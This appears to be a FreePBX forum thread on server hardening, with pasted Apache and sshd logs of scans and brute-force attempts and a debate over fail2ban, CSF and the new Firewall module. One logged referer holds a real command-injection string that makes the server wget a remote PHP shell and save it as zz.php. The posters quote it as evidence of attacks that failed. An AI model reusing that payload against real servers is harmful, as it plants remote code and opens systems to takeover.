[Wed Jun 10 16:49:41 2015] [error] [client 185.25.151.159] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Wed Jun 10 16:51:07 2015] [error] [client 192.187.110.98] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Wed Jun 10 18:53:37 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/billing
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] File does not exist: /var/www/html/vtigercrm
[Wed Jun 10 19:08:02 2015] [error] [client 207.244.91.3] client denied by server configuration: /var/www/html/admin/bootstrap.inc.php
[Wed Jun 10 19:36:18 2015] [error] [client 31.3.226.2] File does not exist: /var/www/html/a2b
[Wed Jun 10 22:22:57 2015] [error] [client 93.174.93.192] File does not exist: /var/www/html/payment
[Thu Jun 11 02:51:07 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 02:51:10 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/pma
[Thu Jun 11 02:51:14 2015] [error] [client 222.205.106.165] File does not exist: /var/www/html/myadmin
[Thu Jun 11 06:29:23 2015] [error] [client 94.102.53.195] File does not exist: /var/www/html/html
[Thu Jun 11 06:46:07 2015] [error] [client 185.25.151.159] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Thu Jun 11 06:46:09 2015] [error] [client 185.49.15.23] script ‘/var/www/html/testproxy.php’ not found or unable to stat
[Thu Jun 11 10:02:36 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/phpMyAdmin
[Thu Jun 11 10:02:40 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/pma
[Thu Jun 11 10:02:43 2015] [error] [client 210.209.138.72] File does not exist: /var/www/html/myadmin
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:42 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:12:53 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:03 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:04 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:10 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:14 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:15 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:18 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:20 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:21 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:28 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:36 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
[Thu Jun 11 10:13:46 2015] [error] [client 222.186.21.179] File does not exist: /var/www/html/manager
These can be effectively eliminated with apache-noscript and apache-nohome jails.
Simple changing the ssh port from 22 will stop
Jun 10 13:58:44 localhost sshd[7831]: Invalid user ubnt from 190.12.31.42
Jun 10 13:58:48 localhost sshd[7833]: Invalid user admin from 190.12.31.42
Jun 10 14:55:47 localhost sshd[15217]: Invalid user ubnt from 183.57.41.101
Jun 10 18:17:54 localhost sshd[3510]: Invalid user ubnt from 58.67.159.31
Jun 10 21:22:28 localhost sshd[8553]: Invalid user a from 219.153.15.122
Jun 10 21:22:32 localhost sshd[8555]: Invalid user arun from 219.153.15.122
Jun 10 22:00:49 localhost sshd[9561]: Invalid user ubnt from 117.218.211.52
Jun 11 00:04:39 localhost sshd[13016]: Invalid user a from 221.226.106.188
Jun 11 02:32:46 localhost sshd[16946]: Invalid user sql from 91.200.12.73
Jun 11 02:32:49 localhost sshd[16948]: Invalid user sql from 91.200.12.73
Jun 11 03:33:24 localhost sshd[18547]: Invalid user server from 91.200.12.73
Jun 11 03:33:28 localhost sshd[18549]: Invalid user server from 91.200.12.73
Jun 11 04:11:13 localhost sshd[19925]: Invalid user admin from 91.200.12.73
Jun 11 04:11:16 localhost sshd[19927]: Invalid user admin from 91.200.12.73
Jun 11 04:36:05 localhost sshd[20606]: Invalid user ubnt from 202.85.213.203
Jun 11 06:09:04 localhost sshd[23066]: Invalid user xiuzuan from 27.17.18.141
Jun 11 12:23:53 localhost sshd[930]: Invalid user ubnt from 60.213.190.98
Jun 11 12:52:06 localhost sshd[1820]: Invalid user ubnt from 59.79.168.63
Jun 11 13:12:43 localhost sshd[2641]: Invalid user ubuntu from 60.5.185.18
Jun 11 13:12:47 localhost sshd[2643]: Invalid user ubuntu from 60.5.185.18
Jun 11 14:50:15 localhost sshd[4023]: Invalid user ubnt from 210.57.210.12
At least fail2ban catches those in general.
Hopefully you are seeing that adding prophylactic measure can only improve your current “security theater”
To be plain & simple: while doing the config & stuff, before having trunks configured etc., the machine is NOT expected to receive any incoming SIP login requests, right?
In fact it is probably not expected to send any kind of requests to the 'net, to servers other than FreePBX owns (mirrors etc.) right?
But this is why it’s relevant to know WHEN do these login attempts actually start happening, in relation to box setup & config process. Or so I think
In other words : I find it very hard to believe, that, having e.g. installed & configured a system/distro from scratch, FreePBX or else, and ‘just’ by starting Asterisk to >listen< to the SIP traffic, and talk to a SIP trunk, that this kind of auth failures would just start ‘out of the blue’. Either something affiliated with the ‘invaders’ scans the ‘Internet’ for open port 5060, and then passes findings to the invaders, or something from inside the newly configured system calls home (it may even be a minute, harmless, totally unrelated ‘thing’, maybe just something hosted by the same company that owns the ‘invaders’ servers ? NTP ? Ajax ? PHP ? Just to name what comes to me head…)
I know it may sound like a crazy fairy tale but if /I/ can imagine this, how can I know anyone hasn’t imagined this before
No, as soon as chan-sip/chan-pjsip is loaded by asterisk then traffic on 5060/5061 will become apparent, this machine has no configuration above a login acount on the GUI.
It is not a matter of IF that traffic will appear, it’s just a matter of WHEN.
FWIW after a couple of days
104.255.67.233 network = 104.255.64.0/21 # ARIN US VOLUM-ARIN VolumeDrive
107.150.43.162 network = 107.150.32.0/19 # ARIN US DSV4-8 DataShack, LC
107.150.44.58 network = 107.150.32.0/19 # ARIN US DSV4-8 DataShack, LC
119.81.233.117 network = 119.81.233.112/29 # APNIC US NETBLK-SOFTLAYER-APNIC-CUST-HP702-AP franko
173.242.125.166 network = 173.242.112.0/20 # ARIN US VOLUMEDRIVE VolumeDrive
188.138.102.49 network = 188.138.0.0/17 # RIPE DE DE-INTERGENIA-20090508 PlusServer AG
192.99.67.24 network = 192.99.0.0/16 # ARIN CA OVH-ARIN-7 OVH Hosting, Inc.
195.154.41.244 network = 195.154.0.0/17 # RIPE FR FR-ILIAD-ENTREPRISES-CUSTOMERS Iliad Entreprises Customers
195.154.42.172 network = 195.154.0.0/17 # RIPE FR FR-ILIAD-ENTREPRISES-CUSTOMERS Iliad Entreprises Customers
195.154.42.245 network = 195.154.0.0/17 # RIPE FR FR-ILIAD-ENTREPRISES-CUSTOMERS Iliad Entreprises Customers
199.19.109.121 network = 199.19.104.0/21 # ARIN US VOLUMEDRIVE VolumeDrive
199.217.116.139 network = 199.217.112.0/21 # ARIN US HSI-6 Hosting Solutions International, Inc.
212.83.137.201 network = 212.83.128.0/20 # RIPE FR FRWOL Tiscali France
212.83.154.176 network = 212.83.154.0/23 # RIPE FR FRWOL Tiscali France
212.83.185.153 network = 212.83.160.0/19 # RIPE FR FRWOL Iliad
31.3.252.226 network = 31.3.252.224/29 # RIPE GB RSDEDI-MCHEHHLN Dedicated Server Hosting
46.165.210.84 network = 46.165.208.0/21 # RIPE DE NETDIRECT-NET Leaseweb Germany GmbH (previously netdirekt e. K.)
5.152.222.50 network = 5.152.222.48/29 # RIPE GB RSDEDI-DJNIPIAM Dedicated Server Hosting
5.189.144.122 network = 5.189.144.0/20 # RIPE DE CONTABO Contabo GmbH
5.189.144.123 network = 5.189.144.0/20 # RIPE DE CONTABO Contabo GmbH
5.189.150.193 network = 5.189.144.0/20 # RIPE DE CONTABO Contabo GmbH
5.189.190.186 network = 5.189.176.0/20 # RIPE DE CONTABO Contabo GmbH
62.210.211.233 network = 62.210.128.0/17 # RIPE FR IE-POOL-BUSINESS-HOSTING IP Pool for Iliad-Entreprises Business Hosting Customers
62.210.95.30 network = 62.210.0.0/17 # RIPE FR IE-POOL-BUSINESS-HOSTING IP Pool for Iliad-Entreprises Business Hosting Customers
68.112.84.99 network = 68.112.84.0/24 # ARIN US VERM-CBN-68-112-84-0 Vermont Law School
69.197.179.34 network = 69.197.128.0/18 # ARIN US WHOLESALEINTERNET-2 WholeSale Internet, Inc.
69.64.59.127 network = 69.64.32.0/19 # ARIN US HSI-1 Hosting Solutions International, Inc.
82.205.21.193 network = 82.205.16.0/20 # RIPE PS BSA-BLOCK1-HM-EXPN BSA Block
85.25.93.91 network = 85.25.93.64/26 # RIPE DE AKTUELLINNRW-NET Aktuell in NRWhttp
Notice the developing pattern of clustered attackers, this is not coincidental.
host 5.196.91.180 in network 5.196.0.0/16 # RIPE FR FR-OVH-20120823 OVH SAS
[root@localhost ~]# cat /var/log/httpd/error_log |grep 5.196.91.180
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:26 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] File does not exist: /var/www/html/vtigercrm
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/saky.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/k4ijo.php' not found or unable to stat
[Thu Jun 11 16:30:27 2015] [error] [client 5.196.91.180] script '/var/www/html/alex.php' not found or unable to stat
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:54 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/thaer.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat, referer: http://1337s.cc/index.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] script '/var/www/html/recordings/misc/index.php' not found or unable to stat
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/ama.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/Do_Me.php
[Sat Jun 13 14:46:53 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/ama.php
You will see that over days that he is probing for known vulnerabilities (the old hands will perhaps recognize the vulnerabilities), then a couple of days later he tries to inject unsuccessfully
cat /var/log/httpd/error_log |grep MAYET
[Fri Jun 12 11:00:46 2015] [error] [client 81.10.94.241] File does not exist: /var/www/html/favicon.ico, referer: http://162.42.215.183/admin/modules/backup/page.backup.php?action=deletedataset&dir=%27;wget%20http://184.107.105.35/classes/ELMAYET_ELMAYET.txt%20%20-O%20zz.php;%20echo%20%27mission%20done
[Sat Jun 13 14:14:52 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:55 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
[Sat Jun 13 14:14:56 2015] [error] [client 5.196.91.180] client denied by server configuration: /var/www/html/recordings/misc/MAYET.php
One directed google for MAYET would find a guy in South Africa who is an expert in VOIP and security (I’m sure his work was stolen), but if you read the script
(zz.php) it would really be quite devastating if it got on your machine, here apache-nohome jail would have caught him on Thu Jun 11 16:30:26 2015. You should reasonably use a long bantime to mitigate the threat.
Yes this was a failed attempt, but as you see the risk is real and on this machine a related but more robust attack would expose the server to penetration needlessly.
Food for thought maybe? or just should we sweep it under the rug
(to this and the next message)
Interesting, indeed.
Can we treat this in stages, probably?
pre-requisite: set up wireshark or something like that on separate machine (or separate VM maybe even better), adjacent to the one you’re looking at, to intercept / look at packet flow incoming to the one where you’ll be installing FreePBX.
at the very least record packet source and destination (and src/dst ports) in timely correlation with
distro setup (take note of FreePBX servers/mirrors accessed)
(- system set up, first ever GUI / dashboard /access/login)
system up, NOT running asterisk
system up, running asterisk but no chan-sip/chan-pjsip / not listening to port 5060
system up, running asterisk with channel module as described above (no configuration but a login account on the GUI)
(what the above is supposed to track/find, is : are there any hosts on the 'net other than FreePBX Project/Sangoma/Digium etc, that your test machine is sending ANY sort of packets TO at ANY point ? Even the smallest ones.)
Like I said, I find it quite unbelievable, that a newly setup system would ‘just’ get itself under potential bruteforcing or DDoS attack ‘just like that’ without something ‘from inside’ of it letting the invaders know it’s there. Note that ‘something inside’ may also be completely unrelated to Asterisk.
You could do all that crazy stuff but the result would not reveal anthing nefarious.
Any unsolicited connection on any port that your server has open will be serviced This includes tcp 5038,22,80,8088 and the one that isymphony uses, also udp 53,69,123,4569,5060 and 5061 on this machine.
Whether you find it believable or not, connections WILL eventually arrive on those ports. At this point in time this machine has only filtered ssh tcp/22 successfully 80 times for 2 hosts out of +14000 total connections from 227 different hosts, a vast majority of which where to to udp/5060 but a significant minority to http “files” and “scripts” that don’t exist.
I wanted to respond to dicko’s original request concerning the need for an open source firewall on all of the aggregations. Couldn’t agree more! For what it’s worth, here’s what we have done thus far with Incredible PBX, and we plan to implement the same methodology in the next iteration of PBX in a Flash. We’ve shared the same setup with the Elastix folks. We use a combination of IPtables, Fail2Ban, Port Knocker, and VPNs to lock down servers as part of the base install using a whitelist of local IP addresses, ITSP’s, and the IP addresses of the server itself and the desktop machine from which the server was created. Users can add/delete whitelist entries using simple scripts. Entries can be either IP addresses, ranges of IP addresses, or FQDNs. Port Knocker assures that nobody ever gets locked out of their server because of a missing whitelist address. We would be more than happy to share our GPL tools with anyone deploying GPL-based systems.
As a general rule, we’ve concluded that blacklists don’t work. They either get poisoned by nefarious activity from the bad guys themselves, or they drive everyone crazy trying to keep them updated, or the bad guys use compromised (mostly Windows) PCs to gain access. Having said that, country-specific blacklists work pretty well to at least reduce exposure from countries that should never have access to your server. We’ve had good results with ipset except with OpenVZ cloud-based servers. ipset hooks into the kernel just like IPtables. Here is a tutorial that will show you how to set it up: http://pbxinaflash.com/community/index.php?resources/iptables-blacklist-countries.45/
We appreciate that whitelists cause problems for remote users, especially the technically challenged who frequently travel to different places. Port Knocker works great to quickly open up IPtables for remote access with one button click from any smartphone. VPN access from a smartphone is our preferred remote access approach. Dynamic DNS also is an option for Android users. Unfortunately, it doesn’t work with iPhones. For more permanent remote users, e.g. satellite office workers, we recommend either phones with built-in VPNs or FQDNs using dynamic DNS tools on both the server and remote site.
As to VPN’s, and given their known insecurities (google it) Are yours absolutely limited to SIP/IAX2 and related connections if appropriate? If not you open up a whole new ballgame on your internal network’s firewall needs also, wild androids, windows apple machines running rampant on your network with no curbs as to what they can do?, what could possibly go wrong here ?
(Come on guys 400 odd reads in a week and nobody has ANYTHING to say ? . . .)
it was you who started the offtopic with the bad IP addresses et al. here
Let me rephrase that:
Almost everyone has different usage conditions
What works for me, almost certainly won’t work for anybody else unless they have very similar setup.
Therefore just including a ‘firewall builder’ solution into the distro, is going to ultimately end up setting it into most permissive mode possible OOTB, and there is good chance people will leave it like that forever, thus it will become a bloat and a nuisance and a forum post volume pump, instead of having a chance of protecting anything. If you set it to restrictive mode, people will set it to permissive while trying to get things working and then forget to put it into restrictive mode again.
And then there is the thing @TheJames said about packaging security, which I could not have said better either
What @Ward is describing, and I agree with, is a firewall on all aggregating points. But I’ll argue that a dedicated FreePBX deployment on an appliance does not necessarily count as one (like, mine is behind a specialized gateway/firewall/NAT device) (exception - probably something like PIAF/Elastix installed on your home broadband router with much more limited resources than a dedicated appliance can have; I can recognize that. Would /I/ use it for intra office purposes ? Probably not. But YMMV, or - if it may come to that, who knows… then I would like for such a device to have strongest firewall applicable.)
Whether you agree or not, you NEED a firewall, (you are already using fail2ban, which in your case is currently ineffectual in some deployments) a good firewall will allow what you want and deny what you don’t want., the concept is a simple as that.
As to what you want (which is not the same as what you need ) then use miscellaneous scripts or perhaps use a mature and more than adequate “firewall builder” like CSF
for the basic principles, concepts and abilities, It can do a LOT more to monitor your system and then inject in realtime iptables “allows” and “denies” as appropriate than any “miscellaneous script” I know of can.
If your use case is not generally included in that document or you think it is all pixey dust then please suggest an alternative.
May I strongly suggest muting the audio when playing this video. The acoustic guitar rendition of Pacheb
elbel’S canon in D major is really bad musicianship.
I had been out of the loop lately and had not seen port knocker. it’s a good idea.
I suggested a year ago in my organization that we build a dynamic DNS server. Clients would run the DDNS client. The firewall would then only accept IP traffic from users authenticated on the DDNS platform.
It would stop the drive by hackers dead in their tracks. Securing against a person specifically trying to hack you such as an employee or a customer is a different requirement and a risk most accept for the convenience of remotes access.
Hah. Funny that this post was bubbled up to the top of my thread list, what with the new Firewall module!
Consider your challenge accepted, run with, and complete, @dicko!
As we discussed on IRC, CSF isn’t open source, (in fact, their licence says you can’t even look at the source!) so we couldn’t use that. But I think everyone’s pretty happy with the (100% real AGPL v3+ FOSS) Firewall module.
Well although I can’t agree with your interpretation of their license (and I have talked to them) , I will give you that you perhaps obliquely took up the challenge, so that is excellent.
Completed perhaps, only when running , as you promised, on any FreePBX unconstrained by commercially licensed pre-requirements. I am a old curmudgeon, if you add ipsets and comprehensive forwarding rules and I will sample it again
3.1 You shall not:
3.1.1 modify, adapt, merge, translate, decompile,
disassemble, or reverse engineer the Product, except as
permitted by law; or
If that’s not what they intend, they should fix their licence, because it’s pretty explicit there that you’re not allowed to look at the code, in any way, shape, or form. There’s no exclusion anywhere else that allows you to look at the code, even for evaluation. So, yeah, this is in no way shape or form open source. Really, truly. If they WANT it to be open source, they need to fix that licence. Until then, they can’t claim it’s OSS, or even OSS friendly (as they could at least have an exclusion for use with LGPL code).
Maybe, but there’s no need for it at the moment. Feature request? (But, WHY?)
Never. This is not a network firewall. This is a system firewall. There are plenty of firewalls that handle (easy) network stuff. This is a system firewall, which is hard and complex, and people mess up.
No where does it say you can not read/look at it It does say you can’t “modify, adapt, merge, translate, decompile, disassemble, or reverse engineer” it or did I miss something in 3.1, In fact you NEED to READ it to understand how it works and how to get the best out of it (ipsets for example) This by my interpretation is encouraged not forbidden.
Because there are connected bot-nets out there, there will always be developing dynamic attack vectors, even the most basic FreePBX installation exposes network services that are vulnerable, even if by drive-by’s , adding dynamic IDS rules like F2B and CSF do by watching connections makes sense to me, generic flood rules will often break imap et al. So FAX2Email/Email2FAX is an example. Specific Asterisk type directed attacks like VTiger/ARI or even I might suggest FreePBX in the past should be scripted.
Pretty well any Linux has iptables as it’s kernel based filter, even if wrapped in systemd/firewalld , As “The Distro” includes Fail2Ban perhaps the recidive jail at least should be dynamically added to you firewall, or are you suggesting that IDS is not needed any more?
I have many NUC’s and PI’s under kitchen sinks somewhere that effectively provide both VOIP and a firewall between COX/COMCAST/ATT and your “connected home” WIFI is cheaper than rewiring a complete house with CAT-5
At least the three of ‘decompile’, ‘disassemble’ and ‘reverse engineer’ cover ‘looking at the source’.
So, yeah, it does say that. Those three things. ‘Reverse Engineer’ covers that even more, as you can’t even attempt to understand what it does. It’s not an open source licence. I don’t know why you’re arguing this? If it was an Open Source licence, it would be open source. Which it’s not.
Open source licenses are licenses that comply with the Open Source Definition — in brief, they allow software to be freely used, modified, and shared.
It’s not open source. It’s closed source. And because it’s written in Perl, the source is available, so they explicitly deny you the privilege to look at it. Just to make sure that you’re aware that it’s not open source.
At no point in that licence I linked to above is there any wording that encourages or even HINTS that you have permission to look at the source. Nowhere. I read it twice, in full, in case I missed something. It’s not there. So, let’s just move on. CSF is free, but it’s not open source, by any stretch of the imagination. (Exactly like the FreePBX modules Sysadmin or Extension routes.)
Kinda don’t know what you’re getting at there, sorry. If you’re saying you want FreePBX Firewall to be a network firewall, then no, that’s never going to happen, as there’s plenty of other things much better at doing that – for example, the modem that connects you to the internet
Never mind Rob, I am happy with my solution, and I think it is better than yours and a little more mature, but that’s OK. There are many ways to connect to the internet , in 2015 pretty well none are modems (modulators/demodulators) many call them routers nowadays, I told you I was a curmudgeon, right ?
Your fearless leader says yours is “perfect”, do you agree?
This turtle could keep better time.